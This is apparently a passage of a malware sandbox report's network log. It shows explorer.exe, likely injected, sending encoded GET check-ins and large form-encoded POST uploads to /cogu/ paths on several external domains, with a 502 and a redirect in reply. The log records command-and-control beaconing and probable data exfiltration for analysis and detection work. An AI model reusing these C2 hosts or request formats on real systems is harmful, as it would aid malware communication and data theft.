7dpzPw5tO_SmSjD8IGDVRHbJb6Dg9GTdkUxKDg3PyTLBFqGN7EY0BeUrQ7xjGiUhBrws0WCkU1WnrYsc0siuij8D5ysQ(ikauEc0F3~GPu4vo2yc6jYubPGg0ZlxfsOiv-VCVMPRvesez0AyXhyGpvzYm_GOVedOscLIYonGajQZZpkiqr(ZgQmOs89XO0u1EzFVy5v3Go7yhpQyZAxakPFgerul2ElYV3NEfqXiOidiIpiy204Oru(63jy-fWCBRh0EA-9kMSpTOO4M3VH9evEaW3sGvBOo55SnmUEDu1H4SNo4cPLS~_IbCkBif7~KFjtcDaXtsrDezQ9On0MUnCRE8jjjsYoJzSSCe2L4ovEuZ_Af3K7fH0(ypA3JZx0nFa(-Pf108yvaNwvevLwP4EYPfTBtCq33XfR6JaBWheWyxry34O01dGsdrq6Ae8ex6R8NbK9uyzOv95MIPw8B4qtToHvxumSPAvy4Wh2tcp5XQnoFmbLVuC2JYruax4H0QEzdsfZjWAZTDq8v~So9e2ouibLSFTsFHrvaqoop75uu96IIVwZu7OpECvHmTGjZPjh3h3iktvvQxDkA4nM2PT5QtnkpWzwq87MjBzK5k1AOJ78-vzajQQ6cxCFgU2BeyazaLZmja90dRmA34Zz7jKkf9ziAM7eBf5~FP_fI2ADrPyV6QHYyM1i6u8NZJAnEh9Fy87fJRwQrMOPVlUHe96Y25oK67Ez8g5P3JcyGp2fF7leVfE(ZntyjQhaIKb4SDOyYynQ6uWGZnUZi7SQvgYQ33Pu0CBTX2ioBWo(3QAhbXN(L7dPISHUe4Q7U8awxGhhRozTF5xeVoFfGmOTZhoeXjsSlJFeelOnY7AEFwZxvUGYdbJH7f0dNWCJgRXQRGLfcMnpRb8AwYuY1YB8VhWmcXJoTDjsN1NQX6aqchlkZrccLUWujrGmxZlpY8TrkiNgpM5wmpompqB(fEKXJgMxUBt1Reah8QAWCarvAj0DRCE4u6EU48ayYbvUlZPVSrYo
Oct 13, 2021 15:52:43.893110991 CEST	7500	OUT	Data Raw: 47 51 2d 44 67 61 51 28 47 28 43 54 4f 63 44 42 75 78 70 72 46 42 64 59 69 61 46 46 71 52 41 4b 30 4b 34 59 74 45 70 72 53 44 4f 6c 36 62 39 4a 4e 34 4d 58 78 74 47 62 6a 70 78 4d 6a 6c 42 28 57 74 50 43 6f 35 7a 6b 4f 76 46 32 6d 51 6d 4c 4b 52 Data Ascii: GQ-DgaQ(G(CTOcDBuxprFBdYiaFFqRAK0K4YtEprSDOl6b9JN4MXxtGbjpxMjlB(WtPCo5zkOvF2mQmLKRStqrmhjK8zu7moxCmFISwPYk2gjPvmmqpQT0XuWUd9lXNikrvvgibZ7er6v3GG9iVMcNLZzoblTCI8JgMRtM4vmpENWu8jKtoA37w6s4rfmFpV8rLS0dTZCdxckKEMmUCNpRJ2P8AYqgnyqtGn4s8RtPt2RIxJfN4
Oct 13, 2021 15:52:43.903929949 CEST	7503	OUT	Data Raw: 6d 50 54 72 75 34 68 77 58 74 56 7a 76 32 53 78 72 6b 55 4c 51 67 6a 4a 75 6d 41 4b 6f 37 34 63 35 7a 4e 42 71 6f 59 47 41 7e 6e 34 7a 37 6a 39 55 4d 76 62 5f 30 63 64 45 46 65 55 61 79 63 64 4f 6c 49 44 78 47 70 65 46 39 72 6b 6f 31 38 69 68 75 Data Ascii: mPTru4hwXtVzv2SxrkULQgjJumAKo74c5zNBqoYGA~n4z7j9UMvb_0cdEFeUaycdOlIDxGpeF9rko18ihuTxfwAe4oOqnOlRZ6GDVi7tjZBd_JDSgMKLMrt0ZTFTH~H31ZKK0foah3TGONUvGyoDvchqdbjzPLEr3jap_LTzmsr3fYaM4FhSEZzZkZEkpaKoO60Xtjr39aC~r(JLKknJ8D7GWcl6RcUxuPfqGAEZ12fIGYYjWRe
Oct 13, 2021 15:52:43.904062986 CEST	7508	OUT	Data Raw: 44 35 6f 6f 70 5a 46 4a 7a 38 72 51 4f 53 72 51 78 54 6d 61 49 66 78 36 7a 44 5a 6d 56 38 4e 73 44 76 42 39 78 41 6a 4c 48 45 59 4e 38 68 70 45 64 37 43 6d 43 77 59 48 65 32 57 56 53 67 74 5a 6f 4f 58 6b 62 44 52 62 53 48 7a 47 56 72 77 6a 32 4b Data Ascii: D5oopZFJz8rQOSrQxTmaIfx6zDZmV8NsDvB9xAjLHEYN8hpEd7CmCwYHe2WVSgtZoOXkbDRbSHzGVrwj2KObe1aWowwD973Owr37kceI-LfEM9lKc0Pdu(wA-gnivvPPXBoMGeyYJffxdmnHFWAbMuVQh7kJArdScXOowqnbvlKKP9E3YkO73uEQIIoyUMFrxi79UWAirSrbjy-bPgj6D1kxr~JGNcDBOs2oaJP4g5JJmfoHmH6
Oct 13, 2021 15:52:43.904412985 CEST	7510	OUT	Data Raw: 6d 38 57 59 78 6c 41 69 67 56 66 39 6d 38 30 41 36 36 61 73 69 7e 66 4b 46 54 37 44 4d 5a 48 4f 56 55 69 51 6d 6c 4a 36 33 34 78 65 75 70 6f 7a 6f 6a 31 74 31 30 77 6f 6d 74 30 6f 6b 68 73 6d 39 4a 7a 48 54 70 64 68 62 6e 6f 7e 70 7e 35 76 52 71 Data Ascii: m8WYxlAigVf9m80A66asi~fKFT7DMZHOVUiQmlJ634xeupozoj1t10womt0okhsm9JzHTpdhbno~p~5vRqkJlDmPkfoih5P6f3QQVFCKoGX~xTftJyiv0zqT9tAjnFj(RV0HvYIaPJv11Ln6p2cgOwKdSrDTzHFvTe3vNy6kMAtcDx_y8fm(URQgxVUkcizW6ADsG7mqfcyRJ2ESp6-WkBBd3EkQNnZ0pDlBKI19ABR(YDWuhll
Oct 13, 2021 15:52:43.904599905 CEST	7524	OUT	Data Raw: 64 48 53 28 41 36 55 42 63 42 30 65 52 43 34 53 71 4d 30 67 62 31 35 64 61 48 61 51 48 70 44 50 73 64 57 36 70 54 5f 6a 72 56 75 4c 49 54 7a 4e 6d 43 64 42 32 61 4d 59 77 44 4d 63 52 52 79 59 48 41 50 39 73 6a 6c 4c 6d 61 39 51 79 4c 69 56 46 4a Data Ascii: dHS(A6UBcB0eRC4SqM0gb15daHaQHpDPsdW6pT_jrVuLITzNmCdB2aMYwDMcRRyYHAP9sjlLma9QyLiVFJdBysRwvn3aaBfv4OQCF4BcEl_Xhz0C97ctHF5gOjevAs8wFuqo6RfNnt0CCgH3Gi9lF8pzWukpUxg~QPogXIsjjnyprYyA0yk2DoicdXf40YLPRUKWZ2XGBbeGggMQmcQPeIA22QUz5X7OZU2Y8v8rene0focbaKf
Oct 13, 2021 15:52:43.904766083 CEST	7527	OUT	Data Raw: 4a 64 62 62 65 32 4d 76 31 38 41 4f 5a 6a 48 43 73 6a 52 61 78 54 75 50 61 35 39 66 31 34 37 45 4e 52 71 51 64 56 69 69 6b 39 6a 61 30 55 5a 34 45 62 6c 46 55 73 64 4c 2d 70 6c 7e 4c 64 63 54 6e 77 36 79 53 67 70 7a 72 46 4b 66 67 75 5a 71 6e 57 Data Ascii: Jdbbe2Mv18AOZjHCsjRaxTuPa59f147ENRqQdViik9ja0UZ4EblFUsdL-pl~LdcTnw6ySgpzrFKfguZqnW-6Lv691IK4jPma3yorhfZUuSyytTRwY3v5SoVx4L65On4S8ww8waXj3GnG0eo67rLUP130SZisnhsFtT1zmfX4wn4p7KGtxU2voshKLJ-4DM84TT3q7S7r3GfI1TTyjdABR7nm_1omNKFNRPMyIW18ANCZhW_3sW4
Oct 13, 2021 15:52:43.914757013 CEST	7530	OUT	Data Raw: 30 73 6b 61 68 69 4f 61 72 48 6a 31 70 6e 4e 61 53 78 47 55 48 41 54 57 66 49 70 58 67 33 4b 79 50 30 52 44 61 38 32 71 31 4a 6a 78 55 70 4c 55 32 4f 67 45 52 68 4c 66 34 42 74 75 38 57 72 56 46 44 2d 6e 6a 68 70 56 66 4f 6f 64 68 38 30 59 76 49 Data Ascii: 0skahiOarHj1pnNaSxGUHATWfIpXg3KyP0RDa82q1JjxUpLU2OgERhLf4Btu8WrVFD-njhpVfOodh80YvIiSWG8IFPND4etejxs1KJDgAvjhf(9(YskeJLr~9ZSt9HDUDwSfAnzHOcLodF5KkRAbDHqeUxMoT1t2AN6gUbzcnkwGbXKjCzDqzzNWVTpqX5Iq_UmCwSinZb-x6ct9Fvdn5UAsJVHQHi3Rp2v3RfBj0ACy1uPIP7J
Oct 13, 2021 15:52:43.915280104 CEST	7533	OUT	Data Raw: 36 72 6b 38 51 71 68 6f 49 4a 4b 7a 52 4d 43 6a 4b 50 72 78 36 4c 45 36 78 55 68 70 39 33 6a 31 45 72 50 73 56 62 48 66 4d 73 55 7e 59 48 4c 5a 47 44 52 58 45 45 55 59 59 35 47 59 4e 76 30 6d 70 6c 4f 76 7a 67 4d 61 59 31 79 56 77 72 72 6e 6c 41 Data Ascii: 6rk8QqhoIJKzRMCjKPrx6LE6xUhp93j1ErPsVbHfMsU~YHLZGDRXEEUYY5GYNv0mplOvzgMaY1yVwrrnlAc0PQETTzYDUynydCNYXfQucfEX9rpPjvHCMW3RepGiKRWnvg1z_gBkFvoh6OL8i(ppWrTUCkdPlTpEcyk4RXUyX6jkTkhGFxgEvl-Fp1_BwaehR(QGUzZ~R(VZM6QwFWTpQnlIiwOwDDrthsRzf3AwQtkE111etFM
Oct 13, 2021 15:52:43.915484905 CEST	7536	OUT	Data Raw: 42 77 32 39 30 6b 38 56 4f 4a 4d 4d 50 62 55 7e 36 77 68 4f 5f 42 6c 7e 4a 32 6e 58 76 4b 73 76 6d 61 30 76 38 31 79 6f 51 43 56 6c 52 44 57 74 41 38 6a 66 73 55 35 50 5f 7a 35 6b 58 73 59 67 6f 43 4c 61 39 4a 62 57 63 66 4a 44 68 28 58 71 4f 51 Data Ascii: Bw290k8VOJMMPbU~6whO_Bl~J2nXvKsvma0v81yoQCVlRDWtA8jfsU5P_z5kXsYgoCLa9JbWcfJDh(XqOQ7shLo2fqdIclaRt(5pFfVdXA70w9dQi71PzS0M3wmtEDLuKsNz4rvvBG52kAO0XTGFNt3Z8lvZ9fRxWROVu9-ankn6d1_hp~1JtlqFu3j~1jQXpCH9SKeppaarX2YxDWjenD_~QIkzYO9LJX2Y6lklV7JdTr_YEEU
Oct 13, 2021 15:52:43.915666103 CEST	7544	OUT	Data Raw: 71 36 73 66 6d 30 7a 31 56 72 7a 4b 74 71 43 64 6e 36 65 41 34 34 6e 7e 38 78 4e 58 66 38 2d 65 32 54 46 56 79 54 73 67 58 44 62 7e 7a 31 78 5a 72 71 72 6e 6c 66 6c 7a 42 6f 31 76 35 6c 64 6a 6c 6d 71 70 34 6b 32 7e 51 69 35 72 4d 63 66 77 37 5a Data Ascii: q6sfm0z1VrzKtqCdn6eA44n~8xNXf8-e2TFVyTsgXDb~z1xZrqrnlflzBo1v5ldjlmqp4k2~Qi5rMcfw7ZGqu9rPUkLddaIOaLxCZ5hTrUDbPWCT7MZGAz7n07K0IbztpDq6l4XJ1M3(KiDFAoZfHjy~joAJc~RXrA2kdzCVX6wUT765Q1ZMgZ37GP6yd0riXVOr00B6rC5I_6WQKC-5FGU0Hnf6FhAobj9uePtbp~UUcOQWa8A
Oct 13, 2021 15:52:43.928471088 CEST	7620	IN	HTTP/1.0 502 Bad Gateway Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 72 65 74 75 72 6e 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 20 6f 72 20 69 6e 63 6f 6d 70 6c 65 74 65 20 72 65 73 70 6f 6e 73 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>502 Bad Gateway</h1>The server returned an invalid or incomplete response.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.11.20	49839	91.195.240.94	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:52:43.904776096 CEST	7527	OUT	GET /cogu/?E6=QRnHbABZr1ah6x+kOaYWzzpt/wEyN1uu/6itxi1XZlZPOwHQf3Tea8RViivUAbn0Nq3Q&GJE=6lTPJF HTTP/1.1 Host: www.nu12.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:52:43.932427883 CEST	7622	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.nu12.online/cogu/?E6=QRnHbABZr1ah6x+kOaYWzzpt/wEyN1uu/6itxi1XZlZPOwHQf3Tea8RViivUAbn0Nq3Q&GJE=6lTPJF Date: Wed, 13 Oct 2021 13:52:43 GMT Content-Length: 151 Connection: close Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 75 31 32 2e 6f 6e 6c 69 6e 65 2f 63 6f 67 75 2f 3f 45 36 3d 51 52 6e 48 62 41 42 5a 72 31 61 68 36 78 2b 6b 4f 61 59 57 7a 7a 70 74 2f 77 45 79 4e 31 75 75 2f 36 69 74 78 69 31 58 5a 6c 5a 50 4f 77 48 51 66 33 54 65 61 38 52 56 69 69 76 55 41 62 6e 30 4e 71 33 51 26 61 6d 70 3b 47 4a 45 3d 36 6c 54 50 4a 46 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="https://www.nu12.online/cogu/?E6=QRnHbABZr1ah6x+kOaYWzzpt/wEyN1uu/6itxi1XZlZPOwHQf3Tea8RViivUAbn0Nq3Q&GJE=6lTPJF">Moved Permanently</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.11.20	49840	172.67.139.41	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:52:48.949616909 CEST	7625	OUT	POST /cogu/ HTTP/1.1 Host: www.researchlearningspirit.xyz Connection: close Content-Length: 131140 Cache-Control: no-cache Origin: http://www.researchlearningspirit.xyz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.researchlearningspirit.xyz/cogu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 45 36 3d 7e 41 4e 77 54 39 30 5f 47 67 7e 6a 32 55 4c 69 34 55 4f 4f 6a 6e 49 59 54 61 50 4a 33 49 37 42 7a 39 56 36 69 67 65 63 65 66 74 37 51 76 52 47 63 68 35 55 70 36 63 4d 41 47 52 62 48 34 44 31 6e 35 28 39 43 62 47 62 76 5a 6e 4a 4e 74 62 42 4d 4b 6b 37 66 4c 54 41 51 43 7e 5a 31 69 46 78 7e 55 46 54 34 30 42 34 6f 46 45 4f 67 6e 6f 35 6c 67 41 51 49 38 70 5f 66 71 62 61 56 31 4d 45 4c 32 39 59 67 57 41 44 58 64 33 44 63 6b 48 2d 47 6c 44 49 53 57 47 5a 4f 39 4a 32 75 51 7e 38 72 55 47 30 4b 67 50 48 75 4f 38 77 4e 67 72 33 4b 46 71 37 28 30 4e 35 49 34 4e 36 50 75 72 55 67 75 73 30 63 54 79 5a 66 56 50 43 68 6e 4e 61 44 70 4c 77 39 4b 4c 36 62 62 67 59 48 6e 7a 4c 69 31 68 6c 75 65 66 44 42 50 31 31 6b 39 71 66 6f 69 45 76 53 6b 4b 66 6a 59 6b 5f 41 4b 78 45 69 6a 37 67 45 37 48 36 48 4e 78 75 47 38 56 7a 63 6c 64 6f 48 61 35 34 70 4a 68 4f 37 77 42 76 78 2d 38 71 72 50 50 61 6e 47 53 74 73 65 78 49 39 53 68 6c 6f 6d 43 65 6d 43 73 56 7e 46 28 6f 4d 73 72 5f 69 37 6f 53 58 68 68 54 55 6b 6a 67 53 35 76 52 63 32 69 68 6a 74 30 62 58 35 4a 58 47 78 42 6f 67 7a 47 54 6a 68 37 36 55 45 64 6f 48 38 28 59 7e 6b 43 75 36 77 36 78 77 44 70 58 56 4d 42 44 77 6b 52 42 4e 48 4e 39 6e 34 55 38 59 79 6d 47 69 36 4f 65 39 38 76 74 78 34 66 7a 69 69 59 57 55 7a 7a 35 68 74 7e 6f 59 6c 79 47 37 46 63 38 55 38 39 67 75 67 6f 72 66 5f 6b 77 6f 57 7a 5a 58 4b 72 69 44 61 63 32 77 32 59 6c 6e 55 69 52 77 6d 71 75 79 72 6f 6a 69 6e 41 54 79 78 79 6f 31 6c 4b 55 32 69 41 58 7a 4c 55 65 73 6d 45 75 6b 5f 71 61 4b 37 51 2d 71 4e 4e 56 62 67 7a 33 46 51 67 71 58 61 38 71 6b 36 6a 2d 76 46 71 52 67 69 4b 49 59 58 64 62 65 70 46 44 61 33 44 54 4b 6e 35 78 46 51 51 2d 4f 58 4e 48 73 73 41 70 51 44 4b 70 46 48 4d 59 6a 57 6d 2d 4a 6f 35 4a 59 63 31 55 48 72 62 64 65 75 61 32 44 32 7a 4f 7a 69 58 36 4d 55 6c 54 59 74 42 36 6f 48 47 52 4e 53 6e 77 59 4a 28 45 33 61 64 43 48 38 46 43 4b 39 49 48 71 43 79 50 49 58 55 66 61 63 55 56 6d 31 55 75 53 6b 6c 5f 4d 52 32 67 32 6d 34 49 38 70 6b 46 62 7a 78 4c 48 7a 4b 57 78 71 37 52 78 33 31 4a 28 43 56 45 55 73 75 43 73 4d 43 71 37 64 62 4c 48 2d 6f 4b 52 31 36 4a 46 37 45 57 75 50 5a 78 61 6c 4b 6c 6d 77 42 45 70 53 35 57 6e 32 67 4b 6e 6e 59 69 44 2d 61 47 57 39 75 69 57 51 70 30 38 4b 7e 64 66 33 37 45 47 6e 75 5a 31 31 50 67 36 67 5a 70 49 43 54 49 37 6b 49 31 52 74 64 6d 6c 6a 45 31 4c 72 6f 48 42 70 6c 33 31 7a 47 47 44 69 33 41 6a 69 4b 62 66 4d 44 53 43 6b 57 49 78 32 5a 78 6d 50 54 42 56 51 77 39 6e 34 32 45 65 7a 52 59 64 56 74 6e 75 4d 61 70 47 66 50 47 68 65 73 4a 32 47 38 39 44 4d 4d 48 45 37 32 45 31 66 54 2d 46 61 55 6c 50 65 6d 74 76 68 6c 48 61 32 4b 68 49 54 4b 68 74 52 79 37 72 58 7e 43 6c 68 42 6d 31 32 57 67 57 66 44 62 69 5a 6b 59 56 50 4a 64 4f 78 65 70 78 45 70 55 6c 72 62 2d 52 41 65 57 59 34 28 72 72 48 65 42 4a 36 47 79 4d 52 69 38 55 7a 7e 6d 79 37 37 42 72 57 77 6a 48 59 72 64 48 2d 36 38 5a 6b 38 58 28 4d 62 71 42 67 61 33 44 71 54 4e 71 4e 48 69 53 4f 76 48 4b 5a 38 45 78 6e 62 37 4f 4b 56 54 43 35 78 36 56 4d 73 4c 52 62 45 44 78 75 35 62 6e 53 58 31 67 4d 57 37 48 71 6e 68 59 4a 6f 76 37 69 50 34 4d 5f 4d 75 28 79 7a 79 7e 54 33 57 5a 4d 74 72 6f 45 6f 36 77 30 50 53 6f 41 47 4a 42 46 5a 41 6b 59 63 45 4b 70 6d 6e 62 4f 68 63 75 38 72 6b 46 53 32 37 62 57 42 77 69 52 56 4b 78 53 28 57 42 78 68 46 41 78 7e 6c 52 45 4c 4a 43 79 38 74 7e 66 75 4f 44 6a 48 63 56 6a 33 54 53 68 55 48 6a 79 7a 57 69 67 6a 4d 61 38 6e 67 35 6d 63 32 44 77 76 32 58 37 33 6f 6f 6f 4b 61 4e 65 6a 55 73 73 71 62 28 5a 39 44 31 45 33 47 7e 58 28 5f 6d 4a 79 6d 48 50 4d 70 73 65 6f 64 75 61 46 4c 76 56 64 2d 4a 78 75 32 43 4a 46 68 6e 58 48 2d 4b 47 63 41 78 4c 32 36 46 37 6f 65 44 63 45 62 7e 42 32 4a 47 66 68 4c 67 48 6c 4a 75 35 7e 7a 4c 5f 75 72 33 79 33 63 72 70 6c 68 4a 74 36 65 37 6a 63 33 61 49 35 52 76 32 57 42 57 30 51 39 53 74 5a 44 45 41 6d 51 51 54 65 70 61 51 7a 63 38 55 32 66 70 7a 4c 4d 78 72 47 36 28 6c 47 4a 6f 36 55 68 34 69 79 79 45 68 39 42 37 4a 33 36 63 52 34 73 67 57 4c 35 78 67 6c 6b 73 67 4a 42 44 64 63 39 31 76 61 70 59 67 41 62 45 5a 44 75 37 59 65 4a 7e 44 62 6f Data Ascii: E6=~ANwT90_Gg~j2ULi4UOOjnIYTaPJ3I7Bz9V6igeceft7QvRGch5Up6cMAGRbH4D1n5(9CbGbvZnJNtbBMKk7fLTAQC~Z1iFx~UFT40B4oFEOgno5lgAQI8p_fqbaV1MEL29YgWADXd3DckH-GlDISWGZO9J2uQ~8rUG0KgPHuO8wNgr3KFq7(0N5I4N6PurUgus0cTyZfVPChnNaDpLw9KL6bbgYHnzLi1hluefDBP11k9qfoiEvSkKfjYk_AKxEij7gE7H6HNxuG8VzcldoHa54pJhO7wBvx-8qrPPanGStsexI9ShlomCemCsV~F(oMsr_i7oSXhhTUkjgS5vRc2ihjt0bX5JXGxBogzGTjh76UEdoH8(Y~kCu6w6xwDpXVMBDwkRBNHN9n4U8YymGi6Oe98vtx4fziiYWUzz5ht~oYlyG7Fc8U89gugorf_kwoWzZXKriDac2w2YlnUiRwmquyrojinATyxyo1lKU2iAXzLUesmEuk_qaK7Q-qNNVbgz3FQgqXa8qk6j-vFqRgiKIYXdbepFDa3DTKn5xFQQ-OXNHssApQDKpFHMYjWm-Jo5JYc1UHrbdeua2D2zOziX6MUlTYtB6oHGRNSnwYJ(E3adCH8FCK9IHqCyPIXUfacUVm1UuSkl_MR2g2m4I8pkFbzxLHzKWxq7Rx31J(CVEUsuCsMCq7dbLH-oKR16JF7EWuPZxalKlmwBEpS5Wn2gKnnYiD-aGW9uiWQp08K~df37EGnuZ11Pg6gZpICTI7kI1RtdmljE1LroHBpl31zGGDi3AjiKbfMDSCkWIx2ZxmPTBVQw9n42EezRYdVtnuMapGfPGhesJ2G89DMMHE72E1fT-FaUlPemtvhlHa2KhITKhtRy7rX~ClhBm12WgWfDbiZkYVPJdOxepxEpUlrb-RAeWY4(rrHeBJ6GyMRi8Uz~my77BrWwjHYrdH-68Zk8X(MbqBga3DqTNqNHiSOvHKZ8Exnb7OKVTC5x6VMsLRbEDxu5bnSX1gMW7HqnhYJov7iP4M_Mu(yzy~T3WZMtroEo6w0PSoAGJBFZAkYcEKpmnbOhcu8rkFS27bWBwiRVKxS(WBxhFAx~lRELJCy8t~fuODjHcVj3TShUHjyzWigjMa8ng5mc2Dwv2X73oooKaNejUssqb(Z9D1E3G~X(_mJymHPMpseoduaFLvVd-Jxu2CJFhnXH-KGcAxL26F7oeDcEb~B2JGfhLgHlJu5~zL_ur3y3crplhJt6e7jc3aI5Rv2WBW0Q9StZDEAmQQTepaQzc8U2fpzLMxrG6(lGJo6Uh4iyyEh9B7J36cR4sgWL5xglksgJBDdc91vapYgAbEZDu7YeJ~DboQRwd5oqJMpw_IHc_Sj~qQsuGmbBpO04SeIEJninRC4leGYRWkIBUVAeET4u5U1rG4BmFH-(7GdYv35jblRRVzrN7yryiW6g6G8Xbb0Di~2n25knxbbfRhfHECgZtmtYpe9Cui9C-(QvV0o7MS0I6djsGfvXetqMxlYzMD7xD4mp2r9H0d-k4SBC62sIRpDGs7bGsfRY6o1XNg95mfCZw5fZB1wQoKh4Gs_YYobGsGwvQDoi_W1k86H(cxNQyvMzz7cbcyquISBpXRFTAp6EPWJdZSBnpLfWJOYJr0jSnQDOuD_DqiNy-scM92-(8N9Ez5suCzBgg~geJ3OH-sXdbCv3PasFQBWqA6h1vBZs2V6FeEzujiohJKGvLQfIp3LMxrTdJw0qJmuDwtB8h~ohMvyvIr46AB8J0SBtdz8aayLy8zNgbp-jMO3LS3cYBeQtm9XhWa6CUdlD2UBhp0pCkF4Xsccp9qsvYWZ8v2xITq3YVqKNRtVHRBO1csSEdk6XO6PthtJYmaPKnmn9990UNiDClnoDpAt9vGuYcXaYsWw86nUNLUEiZMq464CaHKM(KJbPZiLfqHLpLjI3fqrtqPTY5Rb~3JWoYQfloE98z5EusmWSqRW2nOJuN9qAd6SbgQSx5BXMdBTua8YhwwmSKiILcxPsLtY1bdxDO(jSb72CciBwrKdDv4KgE96wOXVMS(iHTmwJKS5ik8k~9sgdxhWqOJtlKO9A25WiwgA7ZHVpsEDVB7-QhRsmii3V2JVlRc0gFkdpA4q3_pnywwfUbJk0pAizLW882gPTA3Mx-KQ3F9FF2TKwG3JiUat5kYKrINqB1N8z8V61NyFT041CdLRYoUnxk9H(BEjyiFHnC5uz_
Oct 13, 2021 15:52:48.949867964 CEST	7635	OUT	Data Raw: 6f 72 76 51 65 30 4a 42 49 6a 72 53 58 41 4c 70 69 46 52 64 73 71 75 57 33 6c 67 4b 4a 71 54 61 64 71 36 4b 56 43 31 77 53 45 4d 5f 75 48 31 47 71 44 41 4f 35 6c 46 6d 6f 35 67 70 37 43 49 38 47 54 32 76 38 78 31 64 70 78 7e 73 56 65 5a 5f 39 51 Data Ascii: orvQe0JBIjrSXALpiFRdsquW3lgKJqTadq6KVC1wSEM_uH1GqDAO5lFmo5gp7CI8GT2v8x1dpx~sVeZ_9Qp2NnXp~OwozJk1evZnJ0Maa1cHPWrMPl3kjnTpRHZU9HpvO3OnIMr98B9vDMNsRGNoRFAWnnmIkaOFuoF63sCdK5I7Smkna2JFT0ryMNTrvQHjB6vMfqdYBWJebWXGVhDAtCuq8vNk8tmkfaiA~mVQKm~ZV1JkKAN
Oct 13, 2021 15:52:48.958885908 CEST	7637	OUT	Data Raw: 48 63 32 62 5a 71 7e 52 58 77 6d 43 70 52 55 58 36 73 6b 59 5a 34 39 6f 44 4c 6b 6c 72 51 4b 5a 47 57 57 6e 74 63 6c 50 36 48 77 35 6f 78 6f 56 6f 35 56 45 4b 4b 38 53 42 4d 59 6d 49 33 28 6b 67 57 67 68 31 63 62 50 31 49 52 4b 48 68 55 74 57 78 Data Ascii: Hc2bZq~RXwmCpRUX6skYZ49oDLklrQKZGWWntclP6Hw5oxoVo5VEKK8SBMYmI3(kgWgh1cbP1IRKHhUtWxr_Lfc-6x9gaT2xWwuq76xGkQrQzci6r2gn8A7bAUQgP8HPXw1foYclJ9Q7tlRX5eHeusnErwsK~CRqyTLRdauzh8wRH5mhQ5EpNuHgaLuh29sUy3OBszka~vqiPSfdny53pVLZEcPrSKV1zSE0MjvSvUsgA9PVyYB
Oct 13, 2021 15:52:48.958966017 CEST	7638	OUT	Data Raw: 58 4c 39 4d 49 57 4a 6c 56 58 31 4e 68 2d 77 39 51 37 66 4c 79 67 62 5f 41 47 42 77 7e 4c 36 34 70 70 4c 78 7a 2d 49 50 43 46 56 5a 4a 42 4f 4c 57 53 68 62 78 59 41 35 45 79 33 75 58 63 32 77 36 52 71 44 76 68 69 44 34 50 68 41 4f 36 66 63 30 75 Data Ascii: XL9MIWJlVX1Nh-w9Q7fLygb_AGBw~L64ppLxz-IPCFVZJBOLWShbxYA5Ey3uXc2w6RqDvhiD4PhAO6fc0uc9RzuhJCuaKEfpM0n847w8l1nzm_7tRvS3HvLES_B-iHjG5cYfW9BQSpxH7t1pQX4WwzE_PmTKbqlvirdwdbISdpEvq8kSyNvQVnPvreOXJCXMymhO6UONrdPrmye42f79a5BHbrV-cFIH~TvCynW_PEyL7taOl1k
Oct 13, 2021 15:52:48.958988905 CEST	7641	OUT	Data Raw: 71 68 76 4f 69 2d 77 54 76 4e 70 39 4d 54 78 43 57 33 59 68 73 64 6b 6d 43 55 70 4e 77 53 4d 42 6a 43 64 59 66 6a 6c 2d 32 57 6c 2d 48 35 67 72 4f 71 49 47 6c 58 58 52 64 39 7e 4f 74 43 32 31 67 6b 58 35 62 75 39 65 61 4e 6f 74 54 73 32 41 69 46 Data Ascii: qhvOi-wTvNp9MTxCW3YhsdkmCUpNwSMBjCdYfjl-2Wl-H5grOqIGlXXRd9~OtC21gkX5bu9eaNotTs2AiF5PFuz_BumpFEpMlTd0ViPrXOyO2lfHrj2w2uuN9JzzGVrwFgKctjL5KCOBsEy5kuvN(tIcSafuKBqoEqyJuWm0KZejbM3utD~e0mbDafi8tmj0hEkJlDeaUWtekIU7C0JJuq3Uu3(S7LrY0pQiD-kpIvb88HQJxet
Oct 13, 2021 15:52:48.959095955 CEST	7642	OUT	Data Raw: 45 4f 78 4a 56 49 69 6f 6e 59 6c 66 4c 79 44 54 32 4e 65 41 7e 59 59 4d 58 57 48 36 79 37 65 71 36 72 55 49 4d 48 69 6a 37 4c 38 54 35 6d 69 39 5a 6f 4d 5f 76 4f 46 41 32 63 46 56 4f 41 6e 62 6b 76 7e 63 50 6e 7e 58 75 52 71 57 36 4a 44 7a 54 38 Data Ascii: EOxJVIionYlfLyDT2NeA~YYMXWH6y7eq6rUIMHij7L8T5mi9ZoM_vOFA2cFVOAnbkv~cPn~XuRqW6JDzT8mavQQz5WBaz9koLhEKmAp9UsqbQahi8tH658YwlDsfzhN6QNayGPPfc9~YeHq8T-~S8L9K~cTzsJT9a7k5M1XaRfdQNlKCwY2v1b3DEOBhvlSGBrfkIRvYGJC354ugHFh-ZJs00A2tyXYvTJ9k~ELKIQ(bf_8Qf0Y
